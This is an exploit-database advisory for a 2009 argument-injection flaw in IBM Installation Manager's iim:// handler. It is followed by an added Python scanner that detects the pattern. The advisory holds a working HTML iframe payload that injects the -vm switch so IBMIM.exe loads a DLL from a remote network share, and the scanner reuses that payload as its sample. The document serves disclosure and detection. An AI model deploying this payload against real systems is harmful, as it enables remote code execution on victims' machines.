Vendor: Rational Robot
By: nine:situations:group::bruiser
CVSS: 9.3 (HIGH)
Type: Remote Code Execution
CWE: 78
Product Name: Rational Robot
Affected Version From: 1.3.2000
Affected Version To: 1.3.2000
Patch Exists: Yes
Related CWE: N/A
CPE: a:ibm:rational_robot
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Internet Explorer
2009

IBM Installation Manager <= 1.3.0 iim:// uri handler remote code execution exploit - IE

Through Internet Explorer, the iim:// URI handler accepts extra command-line arguments for the IBMIM.exe executable, for example the -vm argument, which makes it load an arbitrary DLL from an external network share. The proof of concept works by pointing that path at a library with code in its entry point.

Mitigation:

Update to the latest version of IBM Installation Manager.

Exploit-DB raw data:

<!--
IBM Installation Manager <= 1.3.0 iim:// uri handler remote code execution exploit - IE
by nine:situations:group::bruiser
site: http://retrogod.altervista.org/

vulnerable:
IBM Rational Robot
IBM Rational Team Concert
possibly all Rational products, not Rational Appscan I see

download location: http://www14.software.ibm.com/webapp/download/byproduct.jsp?pgel=ibmhzn1&cm_re=masthead-_-supdl-_-dl-trials
info: http://www-01.ibm.com/software/rational/installmgr/faq.html

bug:
through Internet Explorer it is possible to specify extra command line arguments, ex.
the -vm argument for the IBMIM.exe executable, which will load an arbitrary dll
from an external network share, change the path to your own library with some code
in the entry point
-->

<iframe src='iim://"%20-vm%20\\192.168.0.1\uncshare\sh.dll%20-url%20"'></iframe>
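
A content-filter check for the argument-injection pattern in the proof of concept above, added here as an example and not part of the original advisory or exploit. It assumes the handler places the URL inside a quoted command-line argument (suggested by the PoC's leading and trailing quote); `inspect_uri`, `scan_html` and the benign sample link are hypothetical names and data.

```python
import re
from urllib.parse import unquote

# src/href attribute values that use the iim:// scheme (either quote style).
IIM_ATTR = re.compile(r"""(?:src|href)\s*=\s*(['"])(iim://.*?)\1""", re.I | re.S)
# Whitespace or a quote followed by a dash-prefixed switch such as -vm or -url.
OPTION = re.compile(r'(?:^|[\s"])-[A-Za-z]\w*')
# \\host\share style UNC path.
UNC = re.compile(r'\\\\[^\\\s"]+\\[^\\\s"]+')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so %2522-style double encoding is also seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_uri(uri):
    """Return the reasons an iim:// URI looks like argument injection."""
    body = fully_decode(uri)[len("iim://"):]
    reasons = []
    if '"' in body:            # closes the quoting assumed around the URL argument
        reasons.append("quote-breakout")
    if OPTION.search(body):    # extra switch passed to IBMIM.exe
        reasons.append("injected-option")
    if UNC.search(body):       # library or file on a network share
        reasons.append("unc-path")
    return reasons

def scan_html(html):
    """Return (uri, reasons) for every iim:// src/href attribute in the markup."""
    return [(m.group(2), inspect_uri(m.group(2))) for m in IIM_ATTR.finditer(html)]

# First line is constructed (hypothetical benign link); second is the page's PoC.
SAMPLE = r'''
<a href="iim://install?repo=https://example.invalid/repo">install</a>
<iframe src='iim://"%20-vm%20\\192.168.0.1\uncshare\sh.dll%20-url%20"'></iframe>
'''

if __name__ == "__main__":
    for uri, reasons in scan_html(SAMPLE):
        print("ALERT" if reasons else "ok", reasons, uri)
```

Any one of the three reasons is worth an alert on its own, since a legitimate installer link has no need for a decoded quote, a switch or a UNC path.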